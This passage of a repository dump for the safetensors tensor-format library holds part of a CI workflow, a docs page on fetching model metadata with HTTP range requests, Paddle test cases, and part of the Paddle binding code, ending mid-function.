matrix: 12 | os: [ubuntu-latest, windows-latest] 13 | # Lowest and highest, no version specified so that 14 | # new releases get automatically tested against 15 | version: [{torch: torch==1.10, python: "3.9", arch: "x64", numpy: numpy==1.26.4}, {torch: torch, python: "3.12", arch: "x64", numpy: numpy}] 16 | # TODO this would include macos ARM target. 
17 | # however jax has an illegal instruction issue 18 | # that exists only in CI (probably difference in instruction support). 19 | # include: 20 | # - os: macos-latest 21 | # version: 22 | # torch: torch 23 | # python: "3.11" 24 | include: 25 | - os: ubuntu-latest 26 | version: 27 | torch: torch 28 | python: "3.13" 29 | numpy: numpy 30 | arch: "x64-freethreaded" 31 | - os: macos-15-intel 32 | version: 33 | torch: torch==1.10 34 | numpy: "numpy==1.26" 35 | python: "3.9" 36 | arch: "x64" 37 | - os: macos-latest 38 | version: 39 | torch: torch 40 | python: "3.12" 41 | numpy: numpy 42 | arch: "arm64" 43 | - os: windows-11-arm 44 | version: 45 | torch: torch 46 | python: "3.12" 47 | numpy: numpy 48 | arch: "arm64" 49 | defaults: 50 | run: 51 | working-directory: ./bindings/python 52 | steps: 53 | - name: Checkout repository 54 | uses: actions/checkout@v6 55 | 56 | - name: Install Rust 57 | uses: dtolnay/rust-toolchain@stable 58 | with: 59 | components: rustfmt, clippy 60 | 61 | - name: Cargo install audit 62 | run: cargo install cargo-audit 63 | 64 | - uses: Swatinem/rust-cache@v2 65 | with: 66 | workspaces: "bindings/python" 67 | 68 | - name: Install Python 69 | uses: actions/setup-python@v6 70 | with: 71 | python-version: ${{ matrix.version.python }} 72 | architecture: ${{ matrix.version.arch }} 73 | 74 | - name: Lint with RustFmt 75 | run: cargo fmt -- --check 76 | 77 | - name: Lint with Clippy 78 | run: cargo clippy --all-targets --all-features -- -D warnings 79 | 80 | - name: Run Audit 81 | run: cargo audit -D warnings 82 | 83 | # - name: Install 84 | # run: | 85 | # pip install -U pip 86 | 87 | - name: Install (torch) 88 | if: matrix.version.arch != 'x64-freethreaded' && matrix.os != 'windows-11-arm' 89 | run: | 90 | pip install ${{ matrix.version.numpy }} 91 | pip install ${{ matrix.version.torch }} 92 | shell: bash 93 | 94 | - name: Install (torch freethreaded) 95 | if: matrix.version.arch == 'x64-freethreaded' 96 | run: | 97 | pip install ${{ matrix.version.torch }} --index-url https://download.pytorch.org/whl/cu126 98 | shell: bash 99 | 100 | - name: Install (torch windows arm64) 101 | if: matrix.os == 'windows-11-arm' 102 | run: | 103 | pip install ${{ matrix.version.numpy }} 104 | pip install ${{ matrix.version.torch }} --index-url https://download.pytorch.org/whl/cpu 105 | shell: bash 106 | 107 | - name: Install (hdf5 non windows) 108 | if: matrix.os == 'ubuntu-latest' && matrix.version.arch != 'x64-freethreaded' 109 | run: | 110 | sudo apt-get update 111 | sudo apt-get install libhdf5-dev 112 | 113 | - name: Install (tensorflow) 114 | if: matrix.version.arch != 'x64-freethreaded' && matrix.os != 'windows-11-arm' 115 | run: | 116 | pip install .[tensorflow] 117 | # Force reinstall of numpy, tensorflow uses numpy 2 even on 3.9 118 | pip install ${{ matrix.version.numpy }} 119 | shell: bash 120 | 121 | - name: Install (jax, flax) 122 | if: runner.os != 'Windows' && matrix.version.arch != 'x64-freethreaded' 123 | run: 124 | pip install .[jax] 125 | shell: bash 126 | 127 | - name: Install (mlx) 128 | if: matrix.os == 'macos-latest' 129 | run: | 130 | pip install .[mlx] 131 | shell: bash 132 | 133 | - name: Check style 134 | run: | 135 | pip install .[quality] 136 | ruff format --check . 
137 | 138 | - name: Run tests 139 | if: matrix.version.arch != 'x64-freethreaded' && matrix.os != 'windows-11-arm' 140 | run: | 141 | cargo test 142 | pip install ".[testing]" 143 | pytest -sv tests/ 144 | 145 | - name: Run tests (Windows arm64) 146 | if: matrix.os == 'windows-11-arm' 147 | run: | 148 | cargo test 149 | pip install ".[testing]" 150 | pytest -sv tests/ --ignore=tests/test_tf_comparison.py 151 | 152 | - name: Run tests (freethreaded) 153 | if: matrix.version.arch == 'x64-freethreaded' 154 | run: | 155 | cargo test 156 | pip install ".[testingfree]" 157 | pip install pytest numpy 158 | pytest -sv tests/test_pt* 159 | pytest -sv tests/test_simple.py 160 | 161 | test_s390x_big_endian: 162 | runs-on: ubuntu-latest 163 | permissions: 164 | contents: write 165 | packages: write 166 | name: Test bigendian - S390X 167 | steps: 168 | - uses: actions/checkout@v6 169 | - name: Set up QEMU 170 | uses: docker/setup-qemu-action@v3 171 | - name: Set up Docker Buildx 172 | uses: docker/setup-buildx-action@v3 173 | - name: Can push to GHCR? 174 | id: canpush 175 | shell: bash 176 | run: | 177 | echo "value=${{ github.event.pull_request.head.repo.fork == false }}" >> "$GITHUB_OUTPUT" 178 | - name: Docker meta 179 | id: meta 180 | uses: docker/metadata-action@v5 181 | with: 182 | # list of Docker images to use as base name for tags 183 | images: | 184 | ghcr.io/huggingface/safetensors/s390x 185 | # generate Docker tags based on the following events/attributes 186 | tags: | 187 | type=schedule 188 | type=ref,event=branch 189 | type=ref,event=pr 190 | type=semver,pattern={{version}} 191 | type=semver,pattern={{major}}.{{minor}} 192 | type=semver,pattern={{major}} 193 | type=sha 194 | - name: Login to Registry 195 | if: steps.canpush.outputs.value == 'true' 196 | uses: docker/login-action@v3 197 | with: 198 | registry: ghcr.io 199 | username: ${{ github.actor }} 200 | password: ${{ secrets.GITHUB_TOKEN }} 201 | - name: Test big endian 202 | uses: docker/build-push-action@v6 203 | with: 204 | platforms: linux/s390x 205 | file: Dockerfile.s390x.test 206 | tags: ${{ steps.meta.outputs.tags }} 207 | labels: ${{ steps.meta.outputs.labels }} 208 | cache-from: ${{ steps.canpush.outputs.value == 'true' && 'type=registry,ref=ghcr.io/huggingface/safetensors/s390x:cache,mode=max' || 'type=gha' }} 209 | cache-to: ${{ steps.canpush.outputs.value == 'true' && 'type=registry,ref=ghcr.io/huggingface/safetensors/s390x:cache,mode=max' || 'type=gha' }} 210 | push: ${{ steps.canpush.outputs.value == 'true' }} 211 | -------------------------------------------------------------------------------- /docs/source/metadata_parsing.mdx: -------------------------------------------------------------------------------- 1 | # Metadata Parsing 2 | 3 | Given the simplicity of the format, it's very simple and efficient to fetch and parse metadata about Safetensors weights – i.e. the list of tensors, their types, and their shapes or numbers of parameters – using small [(Range) HTTP requests](https://developer.mozilla.org/en-US/docs/Web/HTTP/Range_requests). 4 | 5 | This parsing has been implemented in JS in [`huggingface.js`](https://huggingface.co/docs/huggingface.js/main/en/hub/modules#parsesafetensorsmetadata) (sample code follows below), but it would be similar in any language. 6 | 7 | ## Example use case 8 | 9 | There can be many potential use cases. For instance, we use it on the HuggingFace Hub to display info about models which have safetensors weights: 10 | 11 |
12 | <!-- screenshots: tensor info for safetensors models as displayed on the Hugging Face Hub -->
20 | 21 | ## Usage 22 | 23 | 24 | 25 | 26 | From [🤗 Hub](hf.co/models), you can get metadata of a model with [HTTP range requests](https://developer.mozilla.org/en-US/docs/Web/HTTP/Range_requests) instead of downloading the entire safetensors file with all the weights. In this example python script below (you can use any language that has HTTP requests support), we are parsing metadata of [gpt2](https://huggingface.co/gpt2/blob/main/model.safetensors). 27 | 28 | ```python 29 | import requests # pip install requests 30 | import struct 31 | 32 | def parse_single_file(url): 33 | # Fetch the first 8 bytes of the file 34 | headers = {'Range': 'bytes=0-7'} 35 | response = requests.get(url, headers=headers) 36 | # Interpret the bytes as a little-endian unsigned 64-bit integer 37 | length_of_header = struct.unpack(' 60 | 61 | 62 | Using [`huggingface.js`](https://huggingface.co/docs/huggingface.js) 63 | 64 | ```ts 65 | import { parseSafetensorsMetadata } from "@huggingface/hub"; 66 | 67 | const info = await parseSafetensorsMetadata({ 68 | repo: { type: "model", name: "bigscience/bloom" }, 69 | }); 70 | 71 | console.log(info) 72 | // { 73 | // sharded: true, 74 | // index: { 75 | // metadata: { total_size: 352494542848 }, 76 | // weight_map: { 77 | // 'h.0.input_layernorm.bias': 'model_00002-of-00072.safetensors', 78 | // ... 79 | // } 80 | // }, 81 | // headers: { 82 | // __metadata__: {'format': 'pt'}, 83 | // 'h.2.attn.c_attn.weight': {'dtype': 'F32', 'shape': [768, 2304], 'data_offsets': [541012992, 548090880]}, 84 | // ... 85 | // } 86 | // } 87 | ``` 88 | 89 | Depending on whether the safetensors weights are sharded into multiple files or not, the output of the call above will be: 90 | 91 | ```ts 92 | export type SafetensorsParseFromRepo = 93 | | { 94 | sharded: false; 95 | header: SafetensorsFileHeader; 96 | } 97 | | { 98 | sharded: true; 99 | index: SafetensorsIndexJson; 100 | headers: SafetensorsShardedHeaders; 101 | }; 102 | ``` 103 | 104 | where the underlying `types` are the following: 105 | 106 | ```ts 107 | type FileName = string; 108 | 109 | type TensorName = string; 110 | type Dtype = "F64" | "F32" | "F16" | "BF16" | "I64" | "I32" | "I16" | "I8" | "U8" | "BOOL"; 111 | 112 | interface TensorInfo { 113 | dtype: Dtype; 114 | shape: number[]; 115 | data_offsets: [number, number]; 116 | } 117 | 118 | type SafetensorsFileHeader = Record & { 119 | __metadata__: Record; 120 | }; 121 | 122 | interface SafetensorsIndexJson { 123 | weight_map: Record; 124 | } 125 | 126 | export type SafetensorsShardedHeaders = Record; 127 | ``` 128 | 129 | 130 | 131 | [`huggingface_hub`](https://huggingface.co/docs/huggingface_hub) provides a Python API to parse safetensors metadata. 132 | Use [`get_safetensors_metadata`](https://huggingface.co/docs/huggingface_hub/package_reference/hf_api#huggingface_hub.HfApi.get_safetensors_metadata) to get all safetensors metadata of a model. 133 | Depending on if the model is sharded or not, one or multiple safetensors files will be parsed. 
134 | 135 | ```python 136 | >>> from huggingface_hub import get_safetensors_metadata 137 | 138 | # Parse repo with single weights file 139 | >>> metadata = get_safetensors_metadata("bigscience/bloomz-560m") 140 | >>> metadata 141 | SafetensorsRepoMetadata( 142 | metadata=None, 143 | sharded=False, 144 | weight_map={'h.0.input_layernorm.bias': 'model.safetensors', ...}, 145 | files_metadata={'model.safetensors': SafetensorsFileMetadata(...)} 146 | ) 147 | >>> metadata.files_metadata["model.safetensors"].metadata 148 | {'format': 'pt'} 149 | 150 | # Parse repo with sharded model (i.e. multiple weights files) 151 | >>> metadata = get_safetensors_metadata("bigscience/bloom") 152 | Parse safetensors files: 100%|██████████████████████████████████████████| 72/72 [00:12<00:00, 5.78it/s] 153 | >>> metadata 154 | SafetensorsRepoMetadata(metadata={'total_size': 352494542848}, sharded=True, weight_map={...}, files_metadata={...}) 155 | >>> len(metadata.files_metadata) 156 | 72 # All safetensors files have been fetched 157 | 158 | # Parse repo that is not a safetensors repo 159 | >>> get_safetensors_metadata("runwayml/stable-diffusion-v1-5") 160 | NotASafetensorsRepoError: 'runwayml/stable-diffusion-v1-5' is not a safetensors repo. Couldn't find 'model.safetensors.index.json' or 'model.safetensors' files. 161 | ``` 162 | 163 | To parse the metadata of a single safetensors file, use [`parse_safetensors_file_metadata`](https://huggingface.co/docs/huggingface_hub/package_reference/hf_api#huggingface_hub.HfApi.parse_safetensors_file_metadata). 164 | 165 | 166 | 167 | 168 | ## Example output 169 | 170 | For instance, here are the number of params per dtype for a few models on the HuggingFace Hub. Also see [this issue](https://github.com/huggingface/safetensors/issues/44) for more examples of usage. 
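These per-dtype counts can be derived directly from a parsed header such as the one returned by the `parse_single_file` helper above: sum the product of each tensor's `shape`, grouped by its `dtype`. A minimal sketch (the `params_per_dtype` name is illustrative, not part of any library):

```python
from collections import defaultdict
from math import prod

def params_per_dtype(header: dict) -> dict:
    """Count parameters per dtype from a parsed safetensors header dict."""
    counts = defaultdict(int)
    for name, info in header.items():
        if name == "__metadata__":  # free-form metadata entry, not a tensor
            continue
        counts[info["dtype"]] += prod(info["shape"])  # prod([]) == 1 covers scalars
    return dict(counts)

# e.g. params_per_dtype(parse_single_file(url)) -> {'F32': 137022720} for gpt2
```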
171 | 172 | model | safetensors | params 173 | --- | --- | --- 174 | [gpt2](https://huggingface.co/gpt2?show_tensors=true) | single-file | { 'F32' => 137022720 } 175 | [roberta-base](https://huggingface.co/roberta-base?show_tensors=true) | single-file | { 'F32' => 124697433, 'I64' => 514 } 176 | [Jean-Baptiste/camembert-ner](https://huggingface.co/Jean-Baptiste/camembert-ner?show_tensors=true) | single-file | { 'F32' => 110035205, 'I64' => 514 } 177 | [roberta-large](https://huggingface.co/roberta-large?show_tensors=true) | single-file | { 'F32' => 355412057, 'I64' => 514 } 178 | [distilbert-base-german-cased](https://huggingface.co/distilbert-base-german-cased?show_tensors=true) | single-file | { 'F32' => 67431550 } 179 | [EleutherAI/gpt-neox-20b](https://huggingface.co/EleutherAI/gpt-neox-20b?show_tensors=true) | sharded | { 'F16' => 20554568208, 'U8' => 184549376 } 180 | [bigscience/bloom-560m](https://huggingface.co/bigscience/bloom-560m?show_tensors=true) | single-file | { 'F16' => 559214592 } 181 | [bigscience/bloom](https://huggingface.co/bigscience/bloom?show_tensors=true) | sharded | { 'BF16' => 176247271424 } 182 | [bigscience/bloom-3b](https://huggingface.co/bigscience/bloom-3b?show_tensors=true) | single-file | { 'F16' => 3002557440 } 183 | -------------------------------------------------------------------------------- /bindings/python/tests/test_paddle_comparison.py: -------------------------------------------------------------------------------- 1 | import unittest 2 | import numpy as np 3 | 4 | from safetensors import safe_open 5 | 6 | 7 | try: 8 | import paddle 9 | from safetensors.paddle import load_file, save_file, save, load 10 | 11 | HAS_PADDLE = True 12 | except ImportError: 13 | HAS_PADDLE = False 14 | 15 | 16 | @unittest.skipIf(not HAS_PADDLE, "Paddle is not available") 17 | class SafeTestCase(unittest.TestCase): 18 | def setUp(self): 19 | data = { 20 | "test": paddle.zeros((1024, 1024), dtype=paddle.float32), 21 | "test2": paddle.zeros((1024, 1024), dtype=paddle.float32), 22 | "test3": paddle.zeros((1024, 1024), dtype=paddle.float32), 23 | "test4": paddle.zeros((1024, 1024), dtype=paddle.complex64), 24 | } 25 | self.paddle_filename = "./tests/data/paddle_load.pdparams" 26 | self.sf_filename = "./tests/data/paddle_load.safetensors" 27 | 28 | paddle.save(data, self.paddle_filename) 29 | save_file(data, self.sf_filename) 30 | 31 | @unittest.expectedFailure 32 | def test_zero_sized(self): 33 | # This fails because paddle wants initialized tensor before 34 | # sending to numpy 35 | data = { 36 | "test": paddle.zeros((2, 0), dtype=paddle.float32), 37 | } 38 | local = "./tests/data/out_safe_paddle_mmap_small2.safetensors" 39 | save_file(data, local) 40 | reloaded = load_file(local) 41 | self.assertTrue(paddle.equal(data["test"], reloaded["test"])) 42 | 43 | def test_deserialization_safe(self): 44 | weights = load_file(self.sf_filename) 45 | 46 | paddle_weights = paddle.load(self.paddle_filename) 47 | for k, v in weights.items(): 48 | tv = paddle_weights[k] 49 | self.assertTrue(np.allclose(v, tv)) 50 | 51 | 52 | @unittest.skipIf(not HAS_PADDLE, "Paddle is not available") 53 | class WithOpenCase(unittest.TestCase): 54 | def test_paddle_tensor_cpu(self): 55 | A = paddle.randn((10, 5)) 56 | tensors = { 57 | "a": A, 58 | } 59 | save_file(tensors, "./tensor_paddle.safetensors") 60 | 61 | # Now loading cpu 62 | with safe_open( 63 | "./tensor_paddle.safetensors", framework="paddle", device="cpu" 64 | ) as f: 65 | tensor = f.get_tensor("a") 66 | 
self.assertEqual(list(tensor.shape), [10, 5]) 67 | assert paddle.allclose(tensor, A).item() 68 | assert not tensor.place.is_gpu_place() 69 | 70 | def test_paddle_tensor_gpu(self): 71 | A = paddle.randn((10, 5)) 72 | tensors = { 73 | "a": A, 74 | } 75 | save_file(tensors, "./tensor_paddle.safetensors") 76 | # Now loading gpu 77 | with safe_open( 78 | "./tensor_paddle.safetensors", framework="paddle", device="cuda" 79 | ) as f: 80 | tensor = f.get_tensor("a") 81 | self.assertEqual(list(tensor.shape), [10, 5]) 82 | assert paddle.allclose(tensor, A).item() 83 | assert tensor.place.is_gpu_place() 84 | 85 | def test_paddle_slice_cpu(self): 86 | A = paddle.randn((10, 5)) 87 | tensors = { 88 | "a": A, 89 | } 90 | save_file(tensors, "./slice_paddle.safetensors") 91 | 92 | # Now loading 93 | with safe_open( 94 | "./slice_paddle.safetensors", framework="paddle", device="cpu" 95 | ) as f: 96 | slice_ = f.get_slice("a") 97 | tensor = slice_[:] 98 | self.assertEqual(list(tensor.shape), [10, 5]) 99 | assert paddle.allclose(tensor, A).item() 100 | assert not tensor.place.is_gpu_place() 101 | 102 | tensor = slice_[tuple()] 103 | self.assertEqual(list(tensor.shape), [10, 5]) 104 | assert paddle.allclose(tensor, A).item() 105 | assert not tensor.place.is_gpu_place() 106 | 107 | tensor = slice_[:2] 108 | self.assertEqual(list(tensor.shape), [2, 5]) 109 | assert paddle.allclose(tensor, A[:2]).item() 110 | assert not tensor.place.is_gpu_place() 111 | 112 | tensor = slice_[:, :2] 113 | self.assertEqual(list(tensor.shape), [10, 2]) 114 | assert paddle.allclose(tensor, A[:, :2]).item() 115 | assert not tensor.place.is_gpu_place() 116 | 117 | tensor = slice_[0, :2] 118 | self.assertEqual(list(tensor.shape), [2]) 119 | assert paddle.allclose(tensor, A[0, :2]).item() 120 | assert not tensor.place.is_gpu_place() 121 | 122 | tensor = slice_[2:, 0] 123 | self.assertEqual(list(tensor.shape), [8]) 124 | assert paddle.allclose(tensor, A[2:, 0]).item() 125 | assert not tensor.place.is_gpu_place() 126 | 127 | tensor = slice_[2:, 1] 128 | self.assertEqual(list(tensor.shape), [8]) 129 | assert paddle.allclose(tensor, A[2:, 1]).item() 130 | assert not tensor.place.is_gpu_place() 131 | 132 | tensor = slice_[2:, -1] 133 | self.assertEqual(list(tensor.shape), [8]) 134 | assert paddle.allclose(tensor, A[2:, -1]).item() 135 | assert not tensor.place.is_gpu_place() 136 | 137 | tensor = slice_[list()] 138 | self.assertEqual(list(tensor.shape), [0, 5]) 139 | assert paddle.allclose(tensor, A[list()]).item() 140 | assert not tensor.place.is_gpu_place() 141 | 142 | def test_paddle_slice_gpu(self): 143 | A = paddle.randn((10, 5)) 144 | tensors = { 145 | "a": A, 146 | } 147 | save_file(tensors, "./slice_paddle.safetensors") 148 | 149 | # Now loading 150 | with safe_open( 151 | "./slice_paddle.safetensors", framework="paddle", device="cuda" 152 | ) as f: 153 | slice_ = f.get_slice("a") 154 | tensor = slice_[:] 155 | self.assertEqual(list(tensor.shape), [10, 5]) 156 | assert paddle.allclose(tensor, A).item() 157 | assert tensor.place.is_gpu_place() 158 | 159 | tensor = slice_[tuple()] 160 | self.assertEqual(list(tensor.shape), [10, 5]) 161 | assert paddle.allclose(tensor, A).item() 162 | assert tensor.place.is_gpu_place() 163 | 164 | tensor = slice_[:2] 165 | self.assertEqual(list(tensor.shape), [2, 5]) 166 | assert paddle.allclose(tensor, A[:2]).item() 167 | assert tensor.place.is_gpu_place() 168 | 169 | tensor = slice_[:, :2] 170 | self.assertEqual(list(tensor.shape), [10, 2]) 171 | assert paddle.allclose(tensor, A[:, :2]).item() 172 | 
assert tensor.place.is_gpu_place() 173 | 174 | tensor = slice_[0, :2] 175 | self.assertEqual(list(tensor.shape), [2]) 176 | assert paddle.allclose(tensor, A[0, :2]).item() 177 | assert tensor.place.is_gpu_place() 178 | 179 | tensor = slice_[2:, 0] 180 | self.assertEqual(list(tensor.shape), [8]) 181 | assert paddle.allclose(tensor, A[2:, 0]).item() 182 | assert tensor.place.is_gpu_place() 183 | 184 | tensor = slice_[2:, 1] 185 | self.assertEqual(list(tensor.shape), [8]) 186 | assert paddle.allclose(tensor, A[2:, 1]).item() 187 | assert tensor.place.is_gpu_place() 188 | 189 | tensor = slice_[2:, -1] 190 | self.assertEqual(list(tensor.shape), [8]) 191 | assert paddle.allclose(tensor, A[2:, -1]).item() 192 | assert tensor.place.is_gpu_place() 193 | 194 | tensor = slice_[list()] 195 | self.assertEqual(list(tensor.shape), [0, 5]) 196 | assert paddle.allclose(tensor, A[list()]).item() 197 | assert tensor.place.is_gpu_place() 198 | 199 | 200 | @unittest.skipIf(not HAS_PADDLE, "Paddle is not available") 201 | class SaveLoadCase(unittest.TestCase): 202 | def test_in_memory(self): 203 | data = { 204 | "test": paddle.zeros((2, 2), dtype=paddle.float32), 205 | } 206 | binary = save(data) 207 | self.assertEqual( 208 | binary, 209 | # Spaces are for forcing the alignment. 210 | b'@\x00\x00\x00\x00\x00\x00\x00{"test":{"dtype":"F32","shape":[2,2],"data_offsets":[0,16]}} ' 211 | b" \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 212 | ) 213 | reloaded = load(binary) 214 | out = paddle.equal(data["test"], reloaded["test"]) 215 | self.assertTrue(paddle.all(out)) 216 | 217 | def test_save_load_cpu(self): 218 | if paddle.__version__ >= "3.2.0": 219 | self.dtype = paddle.bfloat16 220 | else: 221 | self.dtype = paddle.float32 222 | data = { 223 | "test": paddle.randn((2, 2), dtype=self.dtype), 224 | } 225 | self.sf_filename = "./tests/data/paddle_save_load_cpu.safetensors" 226 | save_file(data, self.sf_filename) 227 | reloaded = load(open(self.sf_filename, "rb").read()) 228 | out = paddle.equal(data["test"], reloaded["test"]) 229 | self.assertTrue(paddle.all(out)) 230 | 231 | def test_odd_dtype(self): 232 | if paddle.__version__ >= "3.2.0": 233 | data = { 234 | "test1": paddle.randn((2, 2), dtype=paddle.bfloat16), 235 | "test2": paddle.randn((2, 2), dtype=paddle.float32), 236 | } 237 | self.sf_filename = "./tests/data/paddle_save_load_type.safetensors" 238 | save_file(data, self.sf_filename) 239 | reloaded = load_file(self.sf_filename) 240 | self.assertTrue(paddle.all(paddle.equal(data["test1"], reloaded["test1"]))) 241 | self.assertEqual(reloaded["test1"].dtype, paddle.bfloat16) 242 | self.assertTrue(paddle.all(paddle.equal(data["test2"], reloaded["test2"]))) 243 | self.assertEqual(reloaded["test2"].dtype, paddle.float32) 244 | -------------------------------------------------------------------------------- /bindings/python/py_src/safetensors/paddle.py: -------------------------------------------------------------------------------- 1 | import os 2 | import sys 3 | from typing import Any, Dict, List, Optional, Union 4 | 5 | import numpy as np 6 | import paddle 7 | 8 | from safetensors import numpy, deserialize, safe_open, serialize, serialize_file 9 | 10 | 11 | def save( 12 | tensors: Dict[str, paddle.Tensor], metadata: Optional[Dict[str, str]] = None 13 | ) -> bytes: 14 | """ 15 | Saves a dictionary of tensors into raw bytes in safetensors format. 16 | 17 | Args: 18 | tensors (`Dict[str, paddle.Tensor]`): 19 | The incoming tensors. Tensors need to be contiguous and dense. 
20 | metadata (`Dict[str, str]`, *optional*, defaults to `None`): 21 | Optional text only metadata you might want to save in your header. 22 | For instance it can be useful to specify more about the underlying 23 | tensors. This is purely informative and does not affect tensor loading. 24 | 25 | Returns: 26 | `bytes`: The raw bytes representing the format 27 | 28 | Example: 29 | 30 | ```python 31 | from safetensors.paddle import save 32 | import paddle 33 | 34 | tensors = {"embedding": paddle.zeros((512, 1024)), "attention": paddle.zeros((256, 256))} 35 | byte_data = save(tensors) 36 | ``` 37 | """ 38 | keep_references_alive = [] 39 | serialized = serialize(_flatten(tensors, keep_references_alive), metadata=metadata) 40 | result = bytes(serialized) 41 | return result 42 | 43 | 44 | def save_file( 45 | tensors: Dict[str, paddle.Tensor], 46 | filename: Union[str, os.PathLike], 47 | metadata: Optional[Dict[str, str]] = None, 48 | ) -> None: 49 | """ 50 | Saves a dictionary of tensors into raw bytes in safetensors format. 51 | 52 | Args: 53 | tensors (`Dict[str, paddle.Tensor]`): 54 | The incoming tensors. Tensors need to be contiguous and dense. 55 | filename (`str`, or `os.PathLike`)): 56 | The filename we're saving into. 57 | metadata (`Dict[str, str]`, *optional*, defaults to `None`): 58 | Optional text only metadata you might want to save in your header. 59 | For instance it can be useful to specify more about the underlying 60 | tensors. This is purely informative and does not affect tensor loading. 61 | 62 | Returns: 63 | `None` 64 | 65 | Example: 66 | 67 | ```python 68 | from safetensors.paddle import save_file 69 | import paddle 70 | 71 | tensors = {"embedding": paddle.zeros((512, 1024)), "attention": paddle.zeros((256, 256))} 72 | save_file(tensors, "model.safetensors") 73 | ``` 74 | """ 75 | keep_references_alive = [] 76 | serialize_file( 77 | _flatten(tensors, keep_references_alive), filename, metadata=metadata 78 | ) 79 | 80 | 81 | def load(data: bytes, device: str = "cpu") -> Dict[str, paddle.Tensor]: 82 | """ 83 | Loads a safetensors file into paddle format from pure bytes. 84 | 85 | Args: 86 | data (`bytes`): 87 | The content of a safetensors file 88 | 89 | Returns: 90 | `Dict[str, paddle.Tensor]`: dictionary that contains name as key, value as `paddle.Tensor` on cpu 91 | 92 | Example: 93 | 94 | ```python 95 | from safetensors.paddle import load 96 | 97 | file_path = "./my_folder/bert.safetensors" 98 | with open(file_path, "rb") as f: 99 | data = f.read() 100 | 101 | loaded = load(data) 102 | ``` 103 | """ 104 | if paddle.__version__ >= "3.2.0": 105 | flat = deserialize(data) 106 | return _view2paddle(flat, device) 107 | else: 108 | flat = numpy.load(data) 109 | return _np2paddle(flat, device) 110 | 111 | 112 | def load_file( 113 | filename: Union[str, os.PathLike], device="cpu" 114 | ) -> Dict[str, paddle.Tensor]: 115 | """ 116 | Loads a safetensors file into paddle format. 117 | 118 | Args: 119 | filename (`str`, or `os.PathLike`)): 120 | The name of the file which contains the tensors 121 | device (`Union[Dict[str, any], str]`, *optional*, defaults to `cpu`): 122 | The device where the tensors need to be located after load. 
123 | available options are all regular paddle device locations 124 | 125 | Returns: 126 | `Dict[str, paddle.Tensor]`: dictionary that contains name as key, value as `paddle.Tensor` 127 | 128 | Example: 129 | 130 | ```python 131 | from safetensors.paddle import load_file 132 | 133 | file_path = "./my_folder/bert.safetensors" 134 | loaded = load_file(file_path) 135 | ``` 136 | """ 137 | result = {} 138 | if paddle.__version__ >= "3.2.0": 139 | with safe_open(filename, framework="paddle", device=device) as f: 140 | for k in f.offset_keys(): 141 | result[k] = f.get_tensor(k) 142 | else: 143 | flat = numpy.load_file(filename) 144 | result = _np2paddle(flat, device) 145 | return result 146 | 147 | 148 | def _np2paddle( 149 | numpy_dict: Dict[str, np.ndarray], device: str = "cpu" 150 | ) -> Dict[str, paddle.Tensor]: 151 | for k, v in numpy_dict.items(): 152 | numpy_dict[k] = paddle.to_tensor(v, place=device) 153 | return numpy_dict 154 | 155 | 156 | def _paddle2np(paddle_dict: Dict[str, paddle.Tensor]) -> Dict[str, np.array]: 157 | for k, v in paddle_dict.items(): 158 | paddle_dict[k] = v.detach().cpu().numpy() 159 | return paddle_dict 160 | 161 | 162 | _SIZE = { 163 | paddle.int64: 8, 164 | paddle.float32: 4, 165 | paddle.int32: 4, 166 | paddle.bfloat16: 2, 167 | paddle.float16: 2, 168 | paddle.int16: 2, 169 | paddle.uint8: 1, 170 | paddle.int8: 1, 171 | paddle.bool: 1, 172 | paddle.float64: 8, 173 | paddle.float8_e4m3fn: 1, 174 | paddle.float8_e5m2: 1, 175 | paddle.complex64: 8, 176 | # XXX: These are not supported yet in paddle 177 | # paddle.uint64: 8, 178 | # paddle.uint32: 4, 179 | # paddle.uint16: 2, 180 | # paddle.float8_e8m0: 1, 181 | # paddle.float4_e2m1_x2: 1, 182 | } 183 | 184 | _TYPES = { 185 | "F64": paddle.float64, 186 | "F32": paddle.float32, 187 | "F16": paddle.float16, 188 | "BF16": paddle.bfloat16, 189 | "I64": paddle.int64, 190 | "I32": paddle.int32, 191 | "I16": paddle.int16, 192 | "I8": paddle.int8, 193 | "U8": paddle.uint8, 194 | "BOOL": paddle.bool, 195 | "F8_E4M3": paddle.float8_e4m3fn, 196 | "F8_E5M2": paddle.float8_e5m2, 197 | } 198 | 199 | NPDTYPES = { 200 | paddle.int64: np.int64, 201 | paddle.float32: np.float32, 202 | paddle.int32: np.int32, 203 | # XXX: This is ok because both have the same width 204 | paddle.bfloat16: np.float16, 205 | paddle.float16: np.float16, 206 | paddle.int16: np.int16, 207 | paddle.uint8: np.uint8, 208 | paddle.int8: np.int8, 209 | paddle.bool: bool, 210 | paddle.float64: np.float64, 211 | # XXX: This is ok because both have the same width and byteswap is a no-op anyway 212 | paddle.float8_e4m3fn: np.uint8, 213 | paddle.float8_e5m2: np.uint8, 214 | } 215 | 216 | 217 | def _getdtype(dtype_str: str) -> paddle.dtype: 218 | return _TYPES[dtype_str] 219 | 220 | 221 | def _view2paddle(safeview, device) -> Dict[str, paddle.Tensor]: 222 | result = {} 223 | for k, v in safeview: 224 | dtype = _getdtype(v["dtype"]) 225 | if len(v["data"]) == 0: 226 | # Workaround because frombuffer doesn't accept zero-size tensors 227 | assert any(x == 0 for x in v["shape"]) 228 | arr = paddle.empty(v["shape"], dtype=dtype) 229 | else: 230 | arr = paddle.base.core.frombuffer(v["data"], dtype).reshape(v["shape"]) 231 | if device != "cpu": 232 | arr = arr.to(device) 233 | if sys.byteorder == "big": 234 | arr = paddle.to_tensor(arr.numpy().byteswap(inplace=False), place=device) 235 | result[k] = arr 236 | 237 | return result 238 | 239 | 240 | def _to_ndarray(tensor: paddle.Tensor, name: str): 241 | if not tensor.is_contiguous(): 242 | raise ValueError( 243 | f"You are 
